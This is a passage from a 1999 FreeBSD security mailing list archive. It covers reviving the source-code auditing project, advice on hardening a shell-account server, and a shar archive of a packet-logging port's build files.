with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 12:26: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 105DF14C06; Mon, 31 May 1999 12:24:40 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id PAA00206; Mon, 31 May 1999 15:27:34 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Mon, 31 May 1999 15:27:34 -0400 (EDT) From: Bill Fumerola To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: <19990531102721.F51991@bitbox.follo.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Eivind Eklund wrote: > The auditing project has been dead/sleeping for a *long* while. If it > should be revived, the first thing to do would be to merge over the > OpenBSD fixes, and then have somebody actually *lead* the auditing > project. I could help merge the userland fixes, however I am not the one to lead this. Takers? Should I retire this file to the attic until something comes up? - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 12:28: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from unix.kawartha.com (unix.kawartha.com [204.101.15.2]) by hub.freebsd.org (Postfix) with ESMTP id 3A87F14C06; Mon, 31 May 1999 12:28:01 -0700 (PDT) (envelope-from support@kawartha.com) Received: from kawartha.com (earth.kawartha.com [204.101.15.14]) by unix.kawartha.com (8.9.1/8.8.7) with ESMTP id PAA22029; Mon, 31 May 1999 15:25:30 -0400 (EDT) Message-ID: <3752E3AA.2DFB5E02@kawartha.com> Date: Mon, 31 May 1999 15:31:54 -0400 From: OCD Support X-Mailer: Mozilla 4.6 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Bill Fumerola Cc: Eivind Eklund , freebsd-security@FreeBSD.ORG Subject: Re: auditors References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Could someone please explain more about what the auditing project is? With my understanding it would be a project which keeps track of how many FreeBSD installs there are and maybe what people are using FreeBSD for? Thanks, Paul Stewart Bill Fumerola wrote: > On Mon, 31 May 1999, Eivind Eklund wrote: > > > The auditing project has been dead/sleeping for a *long* while. If it > > should be revived, the first thing to do would be to merge over the > > OpenBSD fixes, and then have somebody actually *lead* the auditing > > project. > > I could help merge the userland fixes, however I am not the one to lead > this. > > Takers? > > Should I retire this file to the attic until something comes up? > > - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - > - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 13: 3: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id DAE25151EA; Mon, 31 May 1999 13:01:29 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id QAA13357; Mon, 31 May 1999 16:03:47 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Mon, 31 May 1999 16:03:47 -0400 (EDT) From: Bill Fumerola To: OCD Support Cc: Eivind Eklund , freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: <3752E3AA.2DFB5E02@kawartha.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, OCD Support wrote: > Could someone please explain more about what the auditing project is? With my > understanding it would be a project which keeps track of how many FreeBSD > installs there are and maybe what people are using FreeBSD for? Nope. It is for auditing (checking for security probelms) code in FreeBSD. http://www.FreeBSD.org/auditors.html should give you an outdated overview. - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 13:15:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 7623114F37 for ; Mon, 31 May 1999 13:14:16 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id AAA14436; Tue, 1 Jun 1999 00:14:15 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id AAA37140; Tue, 1 Jun 1999 00:14:14 +0400 (MSD) Date: Tue, 1 Jun 1999 00:14:13 +0400 (MSD) From: "Ilmar S. Habibulin" To: Snob Art Genre Cc: freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Snob Art Genre wrote: > > And what about posix auditing? Robert Watson made posix.1e audit > > implementation for freebsd. Why do not use his work? > > Different kind of auditing. The first is people vetting code for > security flaws, the second is logging of system events. Oh, i suppose i misunderstood term "auditing". You we talking about source code auditing? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 13:37:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta1-rme.xtra.co.nz (mta.xtra.co.nz [203.96.92.1]) by hub.freebsd.org (Postfix) with ESMTP id 0286314C8D for ; Mon, 31 May 1999 13:37:29 -0700 (PDT) (envelope-from junkmale@pop3.xtra.co.nz) Received: from wocker ([210.55.152.75]) by mta1-rme.xtra.co.nz (InterMail v04.00.02.07 201-227-108) with SMTP id <19990531204003.LQOG7869945.mta1-rme@wocker>; Tue, 1 Jun 1999 08:40:03 +1200 From: "Dan Langille" Organization: The FreeBSD Diary To: "Ilmar S. Habibulin" Date: Tue, 1 Jun 1999 08:37:28 +1200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: auditors Reply-To: junkmale@xtra.co.nz Cc: freebsd-security@FreeBSD.ORG References: In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.01d) Message-Id: <19990531204003.LQOG7869945.mta1-rme@wocker> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1 Jun 99, at 0:14, Ilmar S. Habibulin wrote: > On Mon, 31 May 1999, Snob Art Genre wrote: > > > > And what about posix auditing? Robert Watson made posix.1e audit > > > implementation for freebsd. Why do not use his work? > > > > Different kind of auditing. The first is people vetting code for > > security flaws, the second is logging of system events. > Oh, i suppose i misunderstood term "auditing". You we talking about source > code auditing? Yes. And a cute extract from the URL given (http://www.FreeBSD.org/auditors.html): "Our second step will be this audit, an attempt to methodically go through every line of source in FreeBSD looking for obvious buffer overflows (sprintf()/strcpy() vs nprintf()/strncpy() and so on), less obvious security holes, instances of insufficiently defensive coding, amusing comment strings to forward to freebsd-chat, whatever we run across." I, for one, await the amusing comments. -- Dan Langille - DVL Software Limited The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 15:39: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 847C01555E for ; Mon, 31 May 1999 15:38:57 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.213] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A218BA011C; Mon, 31 May 1999 19:50:00 -0300 Message-ID: <3752E531.54B2845C@tdnet.com.br> Date: Mon, 31 May 1999 19:38:25 +0000 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: security@freebsd.org Subject: Shell Account system Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have plans to set up a FreeBSD box to act as a shell account! I know that security on shell account servers NEED to be very fine, right? Does anybody can point me some url where i can read security tips on FreeBSD/UNIX ? Another questions: where can i read a good tutorial avbout opie ? -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 17:16:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 8D65814E4C; Mon, 31 May 1999 17:16:25 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id JAA30494; Tue, 1 Jun 1999 09:46:23 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA12816; Tue, 1 Jun 1999 09:47:25 +0930 Date: Tue, 1 Jun 1999 09:47:24 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Bill Fumerola Cc: Eivind Eklund , freebsd-security@freebsd.org Subject: Re: auditors In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Bill Fumerola wrote: > On Mon, 31 May 1999, Eivind Eklund wrote: > > > The auditing project has been dead/sleeping for a *long* while. If it > > should be revived, the first thing to do would be to merge over the > > OpenBSD fixes, and then have somebody actually *lead* the auditing > > project. > > I could help merge the userland fixes, however I am not the one to lead > this. Well, I've been doing some work on this lately (merging userland fixes) and Dan Moschuk has pledged his help as well, but I don't feel qualified to act as some kind of "project leader" because of my relative UNIX code inexperience (when I see a patch for a problem I can understand how it fixes it, and whether it applies to our code, but I don't have enough of a big picture yet to go looking for problems myself). Kris ----- "Never criticize anybody until you have walked a mile in their shoes, because by that time you will be a mile away and have their shoes." -- Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 18:54: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id 532D314D27 for ; Mon, 31 May 1999 18:53:45 -0700 (PDT) (envelope-from clash@tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by tasam.com (8.9.3/8.9.1) with SMTP id VAA05185; Mon, 31 May 1999 21:53:28 -0400 (EDT) Message-ID: <002701beabd1$90441c90$7271a1ce@tasam.com> From: "Joe Gleason" To: "Unknow User" , References: <3752E531.54B2845C@tdnet.com.br> Subject: Re: Shell Account system Date: Mon, 31 May 1999 21:53:28 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Use find to locate all suid programs on the system. Remove suid from any you don't think you need. Read man pages if unsure. If still unsure, remove suid anyways. Edit /etc/inetd.conf Disable everything you don't know you need. (As above with suids) Go through rc.conf. Disable things you don't need. If you have a program or service you are installing, try to see if you can get it to run as non-root. I usally like this aproach of removing things that you don't need to minimize security risk. Joe Gleason Tasam ----- Original Message ----- From: Unknow User To: Sent: Monday, May 31, 1999 15:38 Subject: Shell Account system > I have plans to set up a FreeBSD box to act as a shell account! > I know that security on shell account servers NEED to be very fine, > right? > Does anybody can point me some url where i can read security tips on > FreeBSD/UNIX ? > Another questions: where can i read a good tutorial avbout opie ? > > > -- > "The box said 'Requires Windows 98, NT, Linux or better' so I > installed FreeBSD." > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 19:12:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 68F9014D27 for ; Mon, 31 May 1999 19:12:01 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id LAA31492; Tue, 1 Jun 1999 11:41:57 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA29646; Tue, 1 Jun 1999 11:42:59 +0930 Date: Tue, 1 Jun 1999 11:42:59 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Joe Gleason Cc: Unknow User , security@freebsd.org Subject: Re: Shell Account system In-Reply-To: <002701beabd1$90441c90$7271a1ce@tasam.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Joe Gleason wrote: [Snip] Good advice, but running a shell account for people who you don't really trust is still not a wise move for the inexperienced, and not something you can easily document in a webpage. UNIX security is a way of life - there are any number of things which the unwary can trip over which could potentially compromise your machine. If it's for a small group of users who you trust fairly well, you probably should be okay, though. Kris > ----- Original Message ----- > From: Unknow User > To: > Sent: Monday, May 31, 1999 15:38 > Subject: Shell Account system > > > > I have plans to set up a FreeBSD box to act as a shell account! > > I know that security on shell account servers NEED to be very fine, > > right? > > Does anybody can point me some url where i can read security tips on > > FreeBSD/UNIX ? > > Another questions: where can i read a good tutorial avbout opie ? > > > > > > -- > > "The box said 'Requires Windows 98, NT, Linux or better' so I > > installed FreeBSD." > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ----- "Never criticize anybody until you have walked a mile in their shoes, because by that time you will be a mile away and have their shoes." -- Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 19:18: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from netshell.com.br (gabriel.netshell.com.br [200.238.234.134]) by hub.freebsd.org (Postfix) with SMTP id E1F5E154A9 for ; Mon, 31 May 1999 19:17:06 -0700 (PDT) (envelope-from kernel@tdnet.com.br.) Received: (qmail 19817 invoked from network); 1 Jun 1999 02:22:17 -0000 Received: from modem12.tdnet.com.br (HELO tdnet.com.br.) (200.236.148.205) by netshell.buynet.com.br with SMTP; 1 Jun 1999 02:22:17 -0000 Message-ID: <37533B3F.280BAC9A@tdnet.com.br.> Date: Mon, 31 May 1999 22:45:35 -0300 From: Unknow User X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: shell account server Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear gentleman, i am supposed to set up a shell account server. Of course, this kind of server is too able to be hacked, so the system: (The company is beginning, so 100% client satisfaction is highly desirable) 1) once seted up, never reboot it! 2) very fast service, i have to build a fine kernel, compile all necessary softwares including only necessary options! 3) if the system is hacked i will be probably fired 4) No data can be lost. There is some other points, but for now, it's necessary! I began with FreeBSD 2.2.7-Release, i bought the Great Book The Complete FreeBSD, i have a good (not enough) amount of knownledge about seting up FreeBSD machines. But now i have a great opportunity, and i don't wanna perform a bad job! My doubt is: 1 - Which FreeBSD version should i use? 2.2.8-Stable, 3.1-Stable or 3.2-Stable ? 2 - Is there any URL that points me all security bug i have to fixed on the choose version? 3 - Am i going towards right direction choosing FreeBSD ? 4 - I have the book The complete FreeBSD (i bought it with 2.2.7) is it good to buy a updated version, if you suggest me 3.x FreeBSD version! 5 - Be as sincerely as possible, i would like to perform excelent! Thank you for your time and cooperation! PS: i am sorry if the questions is stupid, but i have no one to ask for help!! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 19:18: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from netshell.com.br (gabriel.netshell.com.br [200.238.234.134]) by hub.freebsd.org (Postfix) with SMTP id ABAD414BF1 for ; Mon, 31 May 1999 19:16:41 -0700 (PDT) (envelope-from kernel@tdnet.com.br.) Received: (qmail 19812 invoked from network); 1 Jun 1999 02:21:51 -0000 Received: from modem12.tdnet.com.br (HELO tdnet.com.br.) (200.236.148.205) by gabriel.netshell.com.br with SMTP; 1 Jun 1999 02:21:51 -0000 Message-ID: <37534264.6D29110A@tdnet.com.br.> Date: Mon, 31 May 1999 23:16:04 -0300 From: Unknow User X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway , security@freebsd.org Subject: Re: Shell Account system References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yeah, thanks, but the system is for anyone able to pay, so, you can say i trust nobody. Kris Kennaway wrote: > > On Mon, 31 May 1999, Joe Gleason wrote: > > [Snip] > > Good advice, but running a shell account for people who you don't really trust > is still not a wise move for the inexperienced, and not something you can > easily document in a webpage. UNIX security is a way of life - there are any > number of things which the unwary can trip over which could potentially > compromise your machine. > > If it's for a small group of users who you trust fairly well, you > probably should be okay, though. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 19:22:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 17F9014BC9; Mon, 31 May 1999 19:21:01 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id WAA01071; Mon, 31 May 1999 22:22:23 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Mon, 31 May 1999 22:22:23 -0400 (EDT) From: Bill Fumerola To: Kris Kennaway Cc: Eivind Eklund , freebsd-security@freebsd.org Subject: Re: auditors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 1 Jun 1999, Kris Kennaway wrote: > Well, I've been doing some work on this lately (merging userland fixes) and > Dan Moschuk has pledged his help as well, but I don't feel qualified to act as > some kind of "project leader" because of my relative UNIX code inexperience > (when I see a patch for a problem I can understand how it fixes it, and > whether it applies to our code, but I don't have enough of a big picture yet > to go looking for problems myself). My exact feelings. Perhaps its time for me to go walking through {Open,Net}BSD's cvs tree and start hunting security fixes. I love the BSD license. - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 19:24:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.hamptons.com (mail.hamptons.com [204.141.112.204]) by hub.freebsd.org (Postfix) with ESMTP id 186DE14BC9 for ; Mon, 31 May 1999 19:24:01 -0700 (PDT) (envelope-from timothy@hamptons.com) Received: from [204.141.112.245] ([204.141.112.245]) by mail.hamptons.com with ESMTP (IPAD 2.06) id 5557000 ; Mon, 31 May 1999 21:15:08 EST Message-Id: In-Reply-To: <37534264.6D29110A@tdnet.com.br.> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 31 May 1999 22:24:04 -0500 To: freebsd-security@freebsd.org From: "Timothy R. Platt" Subject: Re: Shell Account system Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Install tripwire, it's in the ports. Better install a traffic logger, or better yet ipfw. You'll need them to log and report all the smurfs, fraggles, and synks you're going to get. Tim >Yeah, thanks, but the system is for anyone able to pay, so, you can say >i trust nobody. > >Kris Kennaway wrote: >> >> On Mon, 31 May 1999, Joe Gleason wrote: >> >> [Snip] >> >> Good advice, but running a shell account for people who you don't really >>trust >> is still not a wise move for the inexperienced, and not something you can >> easily document in a webpage. UNIX security is a way of life - there are any >> number of things which the unwary can trip over which could potentially >> compromise your machine. >> >> If it's for a small group of users who you trust fairly well, you >> probably should be okay, though. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 19:51:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 2BC9214BE2 for ; Mon, 31 May 1999 19:51:30 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id MAA31665; Tue, 1 Jun 1999 12:21:29 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA21801; Tue, 1 Jun 1999 12:22:31 +0930 Date: Tue, 1 Jun 1999 12:22:30 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Unknow User Cc: security@freebsd.org Subject: Re: shell account server In-Reply-To: <37533B3F.280BAC9A@tdnet.com.br.> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Unknow User wrote: > (The company is beginning, so 100% client satisfaction is highly > desirable) > > 1) once seted up, never reboot it! > 2) very fast service, i have to build a fine kernel, compile all > necessary softwares including only necessary options! > 3) if the system is hacked i will be probably fired > 4) No data can be lost. > > There is some other points, but for now, it's necessary! > > I began with FreeBSD 2.2.7-Release, i bought the Great Book The Complete > FreeBSD, i have a good (not enough) amount of knownledge about seting > up FreeBSD machines. If you're really that inexperienced, I seriously doubt you'll be able to do a perfect job first up, no matter how much advice you get (no-one could). Pay a consultant to set the machine up for you is my advice, possibly even hire a good UNIX admin to work for your company. Starting an ISP is not something you can do without experience and understanding - it's a major undertaking and as you noted, if you screw up it will cost you. Kris ----- "Never criticize anybody until you have walked a mile in their shoes, because by that time you will be a mile away and have their shoes." -- Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 21:12:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 42F7D14D08 for ; Mon, 31 May 1999 21:12:49 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id OAA48498 for security@freebsd.org; Tue, 1 Jun 1999 14:12:48 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199906010412.OAA48498@henry.cs.adfa.edu.au> Subject: Pkt loggers: the port To: security@freebsd.org Date: Tue, 1 Jun 1999 14:12:48 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org All, Several people sent in suggestions and improvements for my UDP and TCP packet logging software. I've taken onboard those ideas, and I've just created a FreeBSD port for the new software. Before I submit the final port, would anybody care to try it out and let me know if I've made any dumb mistakes! The port (as a shar file) is below. Thanks, Warren # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # pktsuckers1_2/Makefile # pktsuckers1_2/pkg/COMMENT # pktsuckers1_2/pkg/DESCR # pktsuckers1_2/pkg/PLIST # pktsuckers1_2/pkg/md5 # echo x - pktsuckers1_2/Makefile sed 's/^X//' >pktsuckers1_2/Makefile << 'END-of-pktsuckers1_2/Makefile' XDISTNAME= pktsuckers1_2 XCATEGORIES= security XMASTER_SITES= ftp://minnie.cs.adfa.edu.au/pub/NetSecurity/ XPREFIX= /usr/local X XMAINTAINER= wkt@cs.adfa.edu.au X X.include END-of-pktsuckers1_2/Makefile echo x - pktsuckers1_2/pkg/COMMENT sed 's/^X//' >pktsuckers1_2/pkg/COMMENT << 'END-of-pktsuckers1_2/pkg/COMMENT' XLog contents of unwanted UDP packets and TCP connections END-of-pktsuckers1_2/pkg/COMMENT echo x - pktsuckers1_2/pkg/DESCR sed 's/^X//' >pktsuckers1_2/pkg/DESCR << 'END-of-pktsuckers1_2/pkg/DESCR' XThe two programs tcpsuck and udpsuck run out of the Inetd daemon on Xunused ports. They log the contents of packets or connections to these Xports. This allows you to read the contents of the network strobe Xattacks on your machine. It also slows the strobes down, as they think Xyou're actually running a service on several ports when you aren't. X XWarren Toomey, wkt@cs.adfa.edu.au END-of-pktsuckers1_2/pkg/DESCR echo x - pktsuckers1_2/pkg/PLIST sed 's/^X//' >pktsuckers1_2/pkg/PLIST << 'END-of-pktsuckers1_2/pkg/PLIST' Xlibexec/tcpsuck Xlibexec/udpsuck END-of-pktsuckers1_2/pkg/PLIST echo x - pktsuckers1_2/pkg/md5 sed 's/^X//' >pktsuckers1_2/pkg/md5 << 'END-of-pktsuckers1_2/pkg/md5' XMD5 (pktsuckers1_2.tar.gz) = c3fe342b3afe8107854787fdf2631e35 END-of-pktsuckers1_2/pkg/md5 exit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 22:12:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 6F5B914D66 for ; Mon, 31 May 1999 22:12:53 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id PAA07537; Tue, 1 Jun 1999 15:12:51 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199906010512.PAA07537@henry.cs.adfa.edu.au> Subject: Re: Pkt loggers: the port In-Reply-To: <199906010412.OAA48498@henry.cs.adfa.edu.au> from Warren Toomey at "Jun 1, 1999 2:12:48 pm" To: wkt@cs.adfa.edu.au Date: Tue, 1 Jun 1999 15:12:51 +1000 (EST) Cc: security@FreeBSD.ORG Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Warren Toomey: > All, > Several people sent in suggestions and improvements for my > UDP and TCP packet logging software. I've taken onboard those ideas, > and I've just created a FreeBSD port for the new software. Before > I submit the final port, would anybody care to try it out and let me > know if I've made any dumb mistakes! I've had one reply with good suggestions, and have updated the original source, so the md5 checksum no longer matches. Thanks all! Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 22:19:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id 87FAC1529D; Mon, 31 May 1999 22:18:54 -0700 (PDT) (envelope-from nick@feralmonkey.org) Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id QAA10937; Tue, 1 Jun 1999 16:08:10 GMT (envelope-from nick@feralmonkey.org) Date: Tue, 1 Jun 1999 16:08:08 +0000 (GMT) From: 0x1c To: Bill Fumerola Cc: Kris Kennaway , Eivind 